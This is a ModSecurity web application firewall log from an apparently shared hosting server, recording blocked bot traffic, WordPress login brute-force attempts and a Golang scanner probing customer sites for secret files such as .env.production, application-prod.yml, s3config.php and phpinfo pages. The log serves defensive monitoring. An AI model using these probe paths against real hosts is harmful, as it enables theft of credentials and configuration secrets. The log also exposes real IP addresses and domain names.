[Tue May 26 15:07:30.557560 2026] [security2:error] [pid 678998:tid 679144] [client 85.208.96.209:36858] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-21st/day/2025-03-30/"] [unique_id "ahVp2p-Rl4i_pgT-iAd66gAAABA"]
[Tue May 26 15:07:30.557739 2026] [security2:error] [pid 678998:tid 679144] [client 85.208.96.209:36858] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-21st/day/2025-03-30/"] [unique_id "ahVp2p-Rl4i_pgT-iAd66gAAABA"]
[Tue May 26 15:07:30.686205 2026] [security2:error] [pid 678998:tid 679174] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp2p-Rl4i_pgT-iAd64QAAAC4"]
[Tue May 26 15:07:32.686979 2026] [security2:error] [pid 678998:tid 679167] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp3J-Rl4i_pgT-iAd7GgAAACc"]
[Tue May 26 15:07:32.828941 2026] [security2:error] [pid 678998:tid 679109] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/_phpinfo.php"] [unique_id "ahVp3J-Rl4i_pgT-iAd7KAAAYm4"]
[Tue May 26 15:07:33.875868 2026] [security2:error] [pid 678998:tid 679212] [client 20.12.194.227:13684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dezka.mx"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVp3Z-Rl4i_pgT-iAd7PgAAAFQ"]
[Tue May 26 15:07:33.875969 2026] [security2:error] [pid 678998:tid 679212] [client 20.12.194.227:13684] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dezka.mx"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVp3Z-Rl4i_pgT-iAd7PgAAAFQ"]
[Tue May 26 15:07:34.003030 2026] [security2:error] [pid 678998:tid 679225] [client 20.12.194.227:13632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dezka.mx"] [uri "/about.php"] [unique_id "ahVp3p-Rl4i_pgT-iAd7QgAAAGE"]
[Tue May 26 15:07:34.003137 2026] [security2:error] [pid 678998:tid 679225] [client 20.12.194.227:13632] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dezka.mx"] [uri "/about.php"] [unique_id "ahVp3p-Rl4i_pgT-iAd7QgAAAGE"]
[Tue May 26 15:07:34.648317 2026] [security2:error] [pid 678998:tid 679001] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/api/v1/phpinfo.php"] [unique_id "ahVp3p-Rl4i_pgT-iAd7VQAALAI"]
[Tue May 26 15:07:35.088075 2026] [security2:error] [pid 678998:tid 679254] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp3p-Rl4i_pgT-iAd7VwAAAH4"]
[Tue May 26 15:07:35.497010 2026] [security2:error] [pid 678998:tid 679000] [remote 206.189.187.127:52236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVp35-Rl4i_pgT-iAd7bwAAEwE"]
[Tue May 26 15:07:36.411576 2026] [security2:error] [pid 678998:tid 679114] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/php-info.php"] [unique_id "ahVp4J-Rl4i_pgT-iAd7iAAAYnM"]
[Tue May 26 15:07:37.110755 2026] [security2:error] [pid 678998:tid 679176] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp4J-Rl4i_pgT-iAd7lAAAADA"]
[Tue May 26 15:07:38.170181 2026] [security2:error] [pid 678998:tid 679117] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/infophp.php"] [unique_id "ahVp4p-Rl4i_pgT-iAd7vgAAP3Y"]
[Tue May 26 15:07:39.609775 2026] [security2:error] [pid 678998:tid 679188] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp45-Rl4i_pgT-iAd71AAAADw"]
[Tue May 26 15:07:39.974678 2026] [security2:error] [pid 678998:tid 679068] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/phpinfo"] [unique_id "ahVp45-Rl4i_pgT-iAd76wAAfkU"]
[Tue May 26 15:07:40.852401 2026] [security2:error] [pid 678998:tid 679215] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp5J-Rl4i_pgT-iAd79QAAAFc"]
[Tue May 26 15:07:40.871841 2026] [security2:error] [pid 678998:tid 679126] [remote 154.66.198.148:1512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVp5J-Rl4i_pgT-iAd7_AAAYn8"]
[Tue May 26 15:07:41.815032 2026] [security2:error] [pid 678998:tid 679016] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/api/aws/s3.ts"] [unique_id "ahVp5Z-Rl4i_pgT-iAd8IgAARRE"]
[Tue May 26 15:07:42.949897 2026] [security2:error] [pid 678998:tid 679216] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp5p-Rl4i_pgT-iAd8QwAAAFg"]
[Tue May 26 15:07:43.692262 2026] [security2:error] [pid 678998:tid 679026] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/staging.php"] [unique_id "ahVp55-Rl4i_pgT-iAd8awAAGxs"]
[Tue May 26 15:07:45.349700 2026] [security2:error] [pid 678998:tid 679244] [client 94.103.183.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVp6Z-Rl4i_pgT-iAd8qAAAAHQ"], referer: https://www.anujtradingco.com/
[Tue May 26 15:07:45.687423 2026] [security2:error] [pid 678998:tid 679042] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/staging.js"] [unique_id "ahVp6Z-Rl4i_pgT-iAd8sQAALis"]
[Tue May 26 15:07:45.779735 2026] [security2:error] [pid 678998:tid 679189] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp6Z-Rl4i_pgT-iAd8qgAAAD0"]
[Tue May 26 15:07:45.890240 2026] [security2:error] [pid 678998:tid 679163] [client 221.200.215.58:53206] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "md-74.webhostbox.net"] [uri "/boaform/admin/formLogin"] [unique_id "ahVp6Z-Rl4i_pgT-iAd8tAAAACM"]
[Tue May 26 15:07:46.243734 2026] [security2:error] [pid 678998:tid 679163] [client 221.200.215.58:53206] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahVp6Z-Rl4i_pgT-iAd8tAAAACM"]
[Tue May 26 15:07:46.641715 2026] [security2:error] [pid 678998:tid 679057] [remote 45.250.255.226:50320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVp6p-Rl4i_pgT-iAd8wwAAfjo"]
[Tue May 26 15:07:46.701012 2026] [security2:error] [pid 678998:tid 679162] [client 94.103.183.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVp6p-Rl4i_pgT-iAd8xgAAACI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 15:07:47.344254 2026] [security2:error] [pid 678998:tid 679216] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp6p-Rl4i_pgT-iAd80wAAAFg"]
[Tue May 26 15:07:47.484527 2026] [security2:error] [pid 678998:tid 679020] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/src/main/resources/application.yml"] [unique_id "ahVp65-Rl4i_pgT-iAd84wAAaRU"]
[Tue May 26 15:07:49.294695 2026] [security2:error] [pid 678998:tid 679067] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/src/main/resources/application-prod.yml"] [unique_id "ahVp7Z-Rl4i_pgT-iAd9JAAAe0Q"]
[Tue May 26 15:07:50.009268 2026] [security2:error] [pid 678998:tid 679171] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp7Z-Rl4i_pgT-iAd9OAAAACs"]
[Tue May 26 15:07:51.153370 2026] [security2:error] [pid 678998:tid 679226] [client 74.7.244.61:56866] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVp75-Rl4i_pgT-iAd9bQAAYkA"]
[Tue May 26 15:07:51.182697 2026] [security2:error] [pid 678998:tid 679073] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/app/Services/s3config.php"] [unique_id "ahVp75-Rl4i_pgT-iAd9cAAAWUo"]
[Tue May 26 15:07:51.387422 2026] [security2:error] [pid 678998:tid 679165] [client 94.103.183.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVp75-Rl4i_pgT-iAd9cwAAACU"], referer: https://anujtradingco.com
[Tue May 26 15:07:52.225417 2026] [security2:error] [pid 678998:tid 679227] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp75-Rl4i_pgT-iAd9iQAAAGM"]
[Tue May 26 15:07:53.042918 2026] [security2:error] [pid 678998:tid 679086] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/app/config.php"] [unique_id "ahVp8Z-Rl4i_pgT-iAd9vQAAfVc"]
[Tue May 26 15:07:54.167422 2026] [security2:error] [pid 678998:tid 679173] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp8Z-Rl4i_pgT-iAd92QAAAC0"]
[Tue May 26 15:07:54.783801 2026] [security2:error] [pid 678998:tid 679083] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/server/helper.js"] [unique_id "ahVp8p-Rl4i_pgT-iAd-CAAAdFQ"]
[Tue May 26 15:07:56.608824 2026] [security2:error] [pid 678998:tid 679098] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/helper.js"] [unique_id "ahVp9J-Rl4i_pgT-iAd-UgAAGmM"]
[Tue May 26 15:07:56.738218 2026] [security2:error] [pid 678998:tid 679216] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp9J-Rl4i_pgT-iAd-SAAAAFg"]
[Tue May 26 15:07:57.676055 2026] [security2:error] [pid 678998:tid 679171] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVp9Z-Rl4i_pgT-iAd-cAAAACs"]
[Tue May 26 15:07:57.676578 2026] [security2:error] [pid 678998:tid 679185] [client 35.175.92.196:17718] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVp9Z-Rl4i_pgT-iAd-bgAAADk"]
[Tue May 26 15:07:57.877101 2026] [security2:error] [pid 678998:tid 679233] [client 35.175.92.196:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVp9Z-Rl4i_pgT-iAd-ewAAAGk"]
[Tue May 26 15:07:57.877919 2026] [security2:error] [pid 678998:tid 679141] [client 35.175.92.196:35668] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVp9Z-Rl4i_pgT-iAd-dwAAAA0"]
[Tue May 26 15:07:58.219976 2026] [security2:error] [pid 678998:tid 679130] [client 35.175.92.196:35670] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVp9p-Rl4i_pgT-iAd-iQAAAAI"]
[Tue May 26 15:07:58.440248 2026] [security2:error] [pid 678998:tid 679212] [client 172.58.241.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp9p-Rl4i_pgT-iAd-hAAAAFQ"]
[Tue May 26 15:07:58.580652 2026] [security2:error] [pid 678998:tid 679109] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/settings.py"] [unique_id "ahVp9p-Rl4i_pgT-iAd-lwAAGG4"]
[Tue May 26 15:07:58.850290 2026] [security2:error] [pid 678998:tid 679155] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp9p-Rl4i_pgT-iAd-kwAAABs"]
[Tue May 26 15:08:00.460350 2026] [security2:error] [pid 678998:tid 679001] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/php/phpinfo.php"] [unique_id "ahVp-J-Rl4i_pgT-iAd-xwAAAwI"]
[Tue May 26 15:08:00.739241 2026] [security2:error] [pid 678998:tid 679158] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp-J-Rl4i_pgT-iAd-vgAAAB4"]
[Tue May 26 15:08:01.777275 2026] [security2:error] [pid 678998:tid 679121] [remote 101.99.50.238:58840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.50.99.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVp-Z-Rl4i_pgT-iAd-8gAAGHo"]
[Tue May 26 15:08:02.376038 2026] [security2:error] [pid 678998:tid 679003] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/php_info.php"] [unique_id "ahVp-p-Rl4i_pgT-iAd_AgAAKgQ"]
[Tue May 26 15:08:02.521321 2026] [security2:error] [pid 678998:tid 679002] [remote 74.7.241.58:50042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVp-p-Rl4i_pgT-iAd_BgAAOAM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 15:08:02.748640 2026] [security2:error] [pid 678998:tid 678999] [remote 94.76.235.103:39924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVp-p-Rl4i_pgT-iAd_BwAACAA"]
[Tue May 26 15:08:03.125491 2026] [security2:error] [pid 678998:tid 679175] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp-p-Rl4i_pgT-iAd_DQAAAC8"]
[Tue May 26 15:08:04.148646 2026] [security2:error] [pid 678998:tid 679124] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/information"] [unique_id "ahVp_J-Rl4i_pgT-iAd_LQAAV30"]
[Tue May 26 15:08:04.520152 2026] [security2:error] [pid 678998:tid 679183] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp_J-Rl4i_pgT-iAd_KQAAADc"]
[Tue May 26 15:08:05.909152 2026] [security2:error] [pid 678998:tid 679119] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/system/config.php"] [unique_id "ahVp_Z-Rl4i_pgT-iAd_TQAALng"]
[Tue May 26 15:08:06.047466 2026] [security2:error] [pid 678998:tid 679017] [remote 95.216.117.13:60016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVp_Z-Rl4i_pgT-iAd_TAAAGxI"]
[Tue May 26 15:08:06.119575 2026] [security2:error] [pid 678998:tid 679210] [client 103.240.99.165:53412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.99.240.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVp_Z-Rl4i_pgT-iAd_TgAAAFI"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 15:08:07.405219 2026] [security2:error] [pid 678998:tid 679132] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVp_p-Rl4i_pgT-iAd_YwAAAAQ"]
[Tue May 26 15:08:07.721828 2026] [security2:error] [pid 678998:tid 679016] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/.env.production"] [unique_id "ahVp_5-Rl4i_pgT-iAd_cgAALRE"]
[Tue May 26 15:08:09.399502 2026] [security2:error] [pid 678998:tid 679167] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqAJ-Rl4i_pgT-iAd_ogAAACc"]
